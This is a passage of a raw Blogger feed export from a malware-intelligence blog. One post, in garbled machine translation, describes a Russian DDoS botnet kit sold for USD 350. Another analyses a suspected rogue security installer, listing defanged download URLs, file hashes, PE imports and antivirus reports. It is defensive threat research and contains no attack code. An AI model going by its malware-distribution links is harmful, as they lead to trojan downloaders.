un rol fundamental cuando se la utiliza de modo ofensivo en esa guerra digital también conocida como  Cyber-Warfare , y constituye un recurso que forma parte de una estrategia de ataque involucrada dentro del análisis  CYBINT  ( Cyber Intelligence )."&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Desde una perspectiva relacionada con la ciber-guerra, la DDoS también cumple un rol fundamental cuando se la utiliza de modo ofensivo en esa guerra digital también conocida como  Cyber-Warfare , y constituye un recurso que forma parte de una estrategia de ataque involucrada dentro del análisis  CYBINT  ( Cyber Intelligence )."&gt;&lt;span style="font-weight: bold;"&gt;Intelligence&lt;/span&gt;).&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Ppq0fEGkHo4/Swi5WK627vI/AAAAAAAAB9A/ZbBCh20LjvY/s1600/malwareint-ddod-serv.png#googtrans/es/en"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 267px; height: 161px;" src="http://1.bp.blogspot.com/_Ppq0fEGkHo4/Swi5WK627vI/AAAAAAAAB9A/ZbBCh20LjvY/s320/malwareint-ddod-serv.png" alt="" id="BLOGGER_PHOTO_ID_5406775143197765362" border="0" /&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Sin embargo, bajo este escenario el ataque también puede ser empleado de forma defensiva dentro de una estrategia de análisis que permita evaluar las limitaciones a las que se exponen servicios criticos de un Estado."&gt;However, under this scenario the attack may also be used defensively in an analytical strategy to assess the constraints outlined critical services of a State.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Pero independientemente de los propósitos que se escondan detrás del ataque, los ciber-delincuentes (sobre todo los de origen ruso) constantemente buscan facilitar el asunto  ofreciendo crimeware  desarrollado para ser utilizado exclusivamente con ánimos delictivos."&gt;But whatever purposes they hide behind the attack, cyber-criminals (especially those of Russian origin) constantly seek to facilitate the issue &lt;/span&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/los-precios-del-crimeware-ruso-parte-2.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="Pero independientemente de los propósitos que se escondan detrás del ataque, los ciber-delincuentes (sobre todo los de origen ruso) constantemente buscan facilitar el asunto  ofreciendo crimeware  desarrollado para ser utilizado exclusivamente con ánimos delictivos."&gt;by offering crimeware&lt;/span&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Pero independientemente de los propósitos que se escondan detrás del ataque, los ciber-delincuentes (sobre todo los de origen ruso) constantemente buscan facilitar el asunto  ofreciendo crimeware  desarrollado para ser utilizado exclusivamente con ánimos delictivos."&gt; developed for use exclusively with criminal minds.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="La cuestión es que una nueva aplicación web para el control de botnets, se encuentra In-the-Wild, comercializándose en el mercado clandestino de Rusia a un precio &amp;quot;competitivo&amp;quot;.  USD 350 ."&gt;The point is that a new web application for controlling botnets, is In-the-Wild, marketed in the Russian black market at a "competitive", &lt;span style="font-weight: bold;"&gt;USD&lt;/span&gt; &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="La cuestión es que una nueva aplicación web para el control de botnets, se encuentra In-the-Wild, comercializándose en el mercado clandestino de Rusia a un precio &amp;quot;competitivo&amp;quot;.  USD 350 ."&gt;350.&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="La cuestión es que una nueva aplicación web para el control de botnets, se encuentra In-the-Wild, comercializándose en el mercado clandestino de Rusia a un precio &amp;quot;competitivo&amp;quot;.  USD 350 ."&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/Swi5EjGrdKI/AAAAAAAAB8w/-6Q5-yqxtvk/s1600/mipistus-ddos1.png#googtrans/es/en"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 279px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/Swi5EjGrdKI/AAAAAAAAB8w/-6Q5-yqxtvk/s400/mipistus-ddos1.png" alt="" id="BLOGGER_PHOTO_ID_5406774840452150434" border="0" /&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt;The &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt;crimeware&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt; is designed to recruit and train a botnet zombies (particular purpose) intended exclusively for attacks of the type of DDoS &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt;SYN&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt; &lt;span style="font-weight: bold;"&gt;Flood&lt;/span&gt;, &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt;ICMP&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt; &lt;span style="font-weight: bold;"&gt;Flood&lt;/span&gt;, &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt;UDP,&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt; &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt;HTTP&lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt; and &lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt;HTTPS. &lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt;In the following screenshot shows part of the configuration of the application written in PHP.&lt;/span&gt;&lt;span style="display: inline;" title="Este  crimeware  está diseñado para reclutar zombis y formar una botnet (de propósito particular) destinada exclusivamente para cometer ataques de DDoS del tipo  SYN Flood ,  ICMP Flood ,  UDP ,  HTTP  y  HTTPS . En la siguiente captura se observa parte de la configuración de esta aplicación escrita en PHP."&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Swi5KAmsR5I/AAAAAAAAB84/GAlJKIgpJ4g/s1600/mipistus-ddos2.png#googtrans/es/en"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 158px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/Swi5KAmsR5I/AAAAAAAAB84/GAlJKIgpJ4g/s400/mipistus-ddos2.png" alt="" id="BLOGGER_PHOTO_ID_5406774934270396306" border="0" /&gt;&lt;/a&gt;&lt;span style="display: inline;" title="Entre sus funcionalidades se destacan la posibilidad de ejecutarse como un servicio (lo que forma parte de su estrategia de defensa), el control y administración (C&amp;amp;C) se realiza a través del protocolo HTTP, integración con otros crimeware de su estilo, registro de las actividades (logs) con información procesada sobre cada ataque ( Inteligencia ), entre muchas otras."&gt;Among its outstanding features are the ability to run as a service (which is part of its defense strategy), control and administration (&lt;span style="font-weight: bold;"&gt;C&amp;amp;C&lt;/span&gt;) is done through HTTP, integration with other crimeware of his style, recording of activities (logs) with information processed on each attack&lt;span style="font-weight: bold;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Entre sus funcionalidades se destacan la posibilidad de ejecutarse como un servicio (lo que forma parte de su estrategia de defensa), el control y administración (C&amp;amp;C) se realiza a través del protocolo HTTP, integración con otros crimeware de su estilo, registro de las actividades (logs) con información procesada sobre cada ataque ( Inteligencia ), entre muchas otras."&gt;(Intelligence), &lt;/span&gt;&lt;/span&gt;&lt;span style="display: inline;" title="Entre sus funcionalidades se destacan la posibilidad de ejecutarse como un servicio (lo que forma parte de su estrategia de defensa), el control y administración (C&amp;amp;C) se realiza a través del protocolo HTTP, integración con otros crimeware de su estilo, registro de las actividades (logs) con información procesada sobre cada ataque ( Inteligencia ), entre muchas otras."&gt;among many others.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Yo creo que la investigación de este tipo de acciones delictivas debe poseer ese toque metódico que ofrecen las actividades de Inteligencia, ya que si bien para un usuario hogareño este tipo de ataques puede importar poco, no sucede lo mismo cuando lo que esta en juego son los activos de las compañías. Por lo que los profesionales de seguridad deben estar al corriente del estado del arte del crimeware, e incorporar acciones de Inteligencia en sus actividades profesionales."&gt;I believe that research of this type of criminal activity must have the touch method that offers the activities of intelligence, as though for a home user this type of attack may matter little, not true when what is at stake are assets of the companies. As security professionals should be aware of the state of the art of crimeware, and incorporate measures of intelligence in their work.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="display: inline;" title="Información relacionada con crimeware"&gt;Information related &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/los-precios-del-crimeware-ruso-parte-2.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="Los precios del crimeware ruso. Parte 2"&gt;Russian crimeware prices. Part 2&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/comercio-ruso-de-versiones-privadas-de.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="Comercio Ruso de versiones privadas de crimeware..."&gt;Russian Trade crimeware private versions ...&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/10/zeus-botnet-y-su-poder-de-reclutamiento.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="ZeuS Botnet y su poder de reclutamiento zombi"&gt;ZeuS and power Botnet zombie recruitment&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/07/automatizacion-de-procesos-anti.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="Automatización de procesos anti-análisis II"&gt;Process Automation anti-analysis II&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/08/eleonore-exploits-pack-nueva-crimeware.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="Eleonore Exploits Pack. Nuevo crimeware In-the-Wild"&gt;Eleonore Exploits Pack. New Crimeware In-the-Wild&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/mirando-de-cerca-la-estructura-de.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="Mirando de cerca la estructura de Unique Sploits Pack"&gt;Looking closely at the structure of Unique Sploits Pack&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/04/adrenalin-botnet-zona-de-comando-el.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="Adrenaline botnet: zona de comando. El crimeware ruso..."&gt;Adrenaline botnet: command area. The Russian crimeware ...&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/04/yes-exploit-system-otro-crimeware-made.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="YES Exploit System. Otro crimeware made in Rusia"&gt;YES Exploit System. Another crimeware Made in Russia&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/03/barracuda-bot-botnet-activamente.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="Barracuda Bot. Botnet activamente explotada"&gt;Barracuda Bot. Botnet actively exploited&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/elfiesta-reclutamiento-zombi-traves-de.html#googtrans/es/en"&gt;&lt;span style="display: inline;" title="ElFiesta. Reclutamiento zombi a través de múltiples amenazas"&gt;ElFiesta. Recruitment zombie across multiple threats&lt;/span&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="display: inline;" title="Jorge Mieres"&gt;Jorge Mieres&lt;br /&gt;Pistus Malware Intelligence Blog&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-4948618034835199038?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/4948618034835199038/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=4948618034835199038' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/4948618034835199038'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/4948618034835199038'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/11/ddos-botnet-new-crimeware-particular.html' title='DDoS Botnet. New crimeware particular purpose'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Ppq0fEGkHo4/Swi5WK627vI/AAAAAAAAB9A/ZbBCh20LjvY/s72-c/malwareint-ddod-serv.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-1604109321878908343</id><published>2009-11-20T09:20:00.016-11:00</published><updated>2009-11-20T10:33:26.655-11:00</updated><title type='text'>Is this a Rogueware?</title><content type='html'>When looking through the MySharewareSite.com, I found the following tool and thought of finding more info about the tool.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_gJDtaXmerr4/Swb3CWDUStI/AAAAAAAAAYs/CrhxJ1JhXS0/s1600/Avanquest_system_suite2"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 187px;" src="http://2.bp.blogspot.com/_gJDtaXmerr4/Swb3CWDUStI/AAAAAAAAAYs/CrhxJ1JhXS0/s400/Avanquest_system_suite2" border="0" alt=""id="BLOGGER_PHOTO_ID_5406280022356150994" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt;When trying to click on the following site links:&lt;br /&gt;hxxp://w w w.internetsecurity2.com/?id=avanquest_system_suite&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt;hxxp://w w w.internetsecurity2.com/shots/avanquest_system_suite.gif&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt;hxxp://w w w.internetsecurity2.com/suites/avanquest_system_suite_webinstaller.exe&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt;&lt;br /&gt;When throwing it into &lt;a href="http://jsunpack.jeek.org"&gt;JSunpack&lt;/a&gt; we received the following response:&lt;br /&gt;&lt;br /&gt;Sections ( CODE .rsrc  )&lt;br /&gt;File: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit, PECompact2 compressed&lt;br /&gt;Packer: PECompact V2.X-&gt; Bitsum Technologies,PECompact 2.xx --&gt; BitSum Technologies,ExeShield Protector V3.6 -&gt; www.exeshield.com,&lt;br /&gt;Size: 193536 bytes, &lt;br /&gt;MD5: 161f2a3e3c41dbd451021a3cc1fd2577&lt;br /&gt;&lt;br /&gt;Based on the MD5, VirusTotal gave the following results: &lt;br /&gt;&lt;br /&gt;LINK:  &lt;a href="http://www.virustotal.com/analisis/6bba141f45e25ea9c5cbdf910310114de7be4f97ce7572976a1b1c4c5f1ec6dc-1251400950"&gt;http://www.virustotal.com/analisis/6bba141f45e25ea9c5cbdf910310114de7be4f97ce7572976a1b1c4c5f1ec6dc-1251400950&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_gJDtaXmerr4/Swb6ZENR-mI/AAAAAAAAAY0/vlk3Q8xfKKo/s1600/Virustotal.+MD5:+161f2a3e3c41dbd451021a3cc1fd2577+Suspicious.MH690.A+Trojan.Dldr.Delphi.Gen+Packed.Win32.PePatch!IK_1258748165174.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 224px; height: 400px;" src="http://2.bp.blogspot.com/_gJDtaXmerr4/Swb6ZENR-mI/AAAAAAAAAY0/vlk3Q8xfKKo/s400/Virustotal.+MD5:+161f2a3e3c41dbd451021a3cc1fd2577+Suspicious.MH690.A+Trojan.Dldr.Delphi.Gen+Packed.Win32.PePatch!IK_1258748165174.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5406283711237978722" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;PrevX had a report for the same MD5:&lt;br /&gt;&lt;a href="http://info.prevx.com/aboutprogramtext.asp?PX5=48A52DBD003CF3E7F47D02C51A2AB30007864133&lt;br /&gt;"&gt;http://info.prevx.com/aboutprogramtext.asp?PX5=48A52DBD003CF3E7F47D02C51A2AB30007864133&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;File size: 193536 bytes&lt;br /&gt;MD5   : 161f2a3e3c41dbd451021a3cc1fd2577&lt;br /&gt;SHA1  : 7fb29202fab964bcd48f1b5309021876e5175784&lt;br /&gt;SHA256: 6bba141f45e25ea9c5cbdf910310114de7be4f97ce7572976a1b1c4c5f1ec6dc&lt;br /&gt;PEInfo: PE Structure information&lt;br /&gt;&lt;br /&gt;( base data )&lt;br /&gt;entrypointaddress.: 0x1000&lt;br /&gt;timedatestamp.....: 0x2A425E19 (Sat Jun 20 00:22:17 1992)&lt;br /&gt;machinetype.......: 0x14C (Intel I386)&lt;br /&gt;&lt;br /&gt;( 2 sections )&lt;br /&gt;name viradd virsiz rawdsiz ntrpy md5&lt;br /&gt;CODE 0x1000 0x80000 0x2A200 8.00 414b946f666a25e9a9ead73ea1dd1403&lt;br /&gt;.rsrc 0x81000 0x5000 0x4E00 5.21 6d690ad7615832e8c76b28a3f017c377&lt;br /&gt;&lt;br /&gt;( 11 imports )&lt;br /&gt;&lt;br /&gt;&gt; advapi32.dll: RegQueryValueExA&lt;br /&gt;&gt; comctl32.dll: ImageList_SetIconSize&lt;br /&gt;&gt; gdi32.dll: UnrealizeObject&lt;br /&gt;&gt; kernel32.dll: LoadLibraryA, GetProcAddress, VirtualAlloc, VirtualFree&lt;br /&gt;&gt; ole32.dll: CreateStreamOnHGlobal&lt;br /&gt;&gt; oleaut32.dll: SysFreeString&lt;br /&gt;&gt; shell32.dll: ShellExecuteA&lt;br /&gt;&gt; urlmon.dll: URLDownloadToFileA&lt;br /&gt;&gt; user32.dll: GetKeyboardType&lt;br /&gt;&gt; version.dll: VerQueryValueA&lt;br /&gt;&gt; wininet.dll: DeleteUrlCacheGroup&lt;br /&gt;&lt;br /&gt;When opening in Firefox v3.0.15, I got the following response. It is good that Firefox caught this:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_gJDtaXmerr4/Swb78ie2bkI/AAAAAAAAAY8/OSeA15tC_qw/s1600/Avanquest_system_suite"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 185px;" src="http://1.bp.blogspot.com/_gJDtaXmerr4/Swb78ie2bkI/AAAAAAAAAY8/OSeA15tC_qw/s400/Avanquest_system_suite" border="0" alt=""id="BLOGGER_PHOTO_ID_5406285420171783746" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Norton &lt;a href="http://safeweb.norton.com"&gt;Safeweb&lt;/a&gt; gives the following results:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_gJDtaXmerr4/Swb9PRxUaxI/AAAAAAAAAZE/gM9ci9QoxZ0/s1600/Norton+Safe+Web,+from+Symantec+-+report+for+internetsecurity2.com_1258749228191.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 379px; height: 400px;" src="http://2.bp.blogspot.com/_gJDtaXmerr4/Swb9PRxUaxI/AAAAAAAAAZE/gM9ci9QoxZ0/s400/Norton+Safe+Web,+from+Symantec+-+report+for+internetsecurity2.com_1258749228191.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5406286841614986002" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;DIRECT LINK: &lt;a href="http://safeweb.norton.com/report/show?url=http%3A%2F%2Fwww.internetsecurity2.com%2F%3Fid%3Davanquest_system_suite&amp;x=15&amp;y=12"&gt;http://safeweb.norton.com/report/show?url=http%3A%2F%2Fwww.internetsecurity2.com%2F%3Fid%3Davanquest_system_suite&amp;x=15&amp;y=12&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[COPIED AND PASTED FROM ABOVE REPORT, JUST IN CASE THE ABOVE LINK FAILED]&lt;br /&gt;Threat Report&lt;br /&gt;&lt;br /&gt;Total threats found: 11&lt;br /&gt;&lt;br /&gt;Small-whitebg-red  Viruses (what's this?)&lt;br /&gt;&lt;br /&gt;Threats found: 10&lt;br /&gt;Here is a complete list:&lt;br /&gt;Threat Name:  Downloader&lt;br /&gt;Location:  hxxp://www.internetsecurity2.com/suites/avanquest_system_suite_webinstaller.exe&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt; &lt;br /&gt;Threat Name:  Downloader&lt;br /&gt;Location:  hxxp://www.internetsecurity2.com/suites/trendmicro_internet_security_webinstaller.exe&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt; &lt;br /&gt;Threat Name:  Downloader&lt;br /&gt;Location:  hxxp://www.internetsecurity2.com/suites/registry_sweep_webinstaller.exe&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt; &lt;br /&gt;Threat Name:  Downloader&lt;br /&gt;Location:  hxxp://www.internetsecurity2.com/suites/kaspersky_internet_security_webinstaller.exe&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt; &lt;br /&gt;Threat Name:  Trojan Horse&lt;br /&gt;Location:  hxxp://www.internetsecurity2.com/suites/zonealarm_internet_security_webinstaller.exe&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt; &lt;br /&gt;Threat Name:  Downloader&lt;br /&gt;Location:  hxxp://www.internetsecurity2.com/suites/norton_internet_security_webinstaller.exe&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt; &lt;br /&gt;Threat Name:  Suspicious.MH690&lt;br /&gt;Location:  hxxp://www.internetsecurity2.com/suites/registry_easy_webinstaller.exe&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt; &lt;br /&gt;Threat Name:  Downloader&lt;br /&gt;Location:  hxxp://www.internetsecurity2.com/suites/panda_internet_security_webinstaller.exe&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt; &lt;br /&gt;Threat Name:  Suspicious.MH690&lt;br /&gt;Location:  hxxp://www.internetsecurity2.com/suites/ca_internet_security_webinstaller.exe&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt; &lt;br /&gt;Threat Name:  Suspicious.MH690&lt;br /&gt;Location:  hxxp://www.internetsecurity2.com/suites/registry_cure_webinstaller.exe&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt; &lt;br /&gt;Small-whitebg-red  Security Risks (what's this?)&lt;br /&gt;&lt;br /&gt;Threats found: 1&lt;br /&gt;Here is a complete list:&lt;br /&gt;Threat Name:  HTTP Malicious Toolkit Variant Activity&lt;br /&gt;Location:  hxxp://www.internetsecurity2.com/&lt;br /&gt;[DO NOT CLICK, IT IS POTENTIALLY MALICIOUS]&lt;br /&gt;[COPIED AND PASTED FROM ABOVE REPORT, JUST IN CASE THE ABOVE LINK FAILED]&lt;br /&gt;&lt;br /&gt;DNS Graph:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_gJDtaXmerr4/SwcB8ppHT3I/AAAAAAAAAZc/31Ytd6OBBgk/s1600/20,AS11798,69.89.31.127,box327.bluehost.com,internetsecurity2.com!1AS2,3NET1,3PTR4,5A3,0CNAME5,0UP5!2.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 35px;" src="http://3.bp.blogspot.com/_gJDtaXmerr4/SwcB8ppHT3I/AAAAAAAAAZc/31Ytd6OBBgk/s400/20,AS11798,69.89.31.127,box327.bluehost.com,internetsecurity2.com!1AS2,3NET1,3PTR4,5A3,0CNAME5,0UP5!2.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5406292019163647858" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;DNS Records:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_gJDtaXmerr4/Swb-x3FQJCI/AAAAAAAAAZM/Xyv3wD5cXzc/s1600/www.internetsecurity2.com_1258749620999.png"&gt;&lt;img 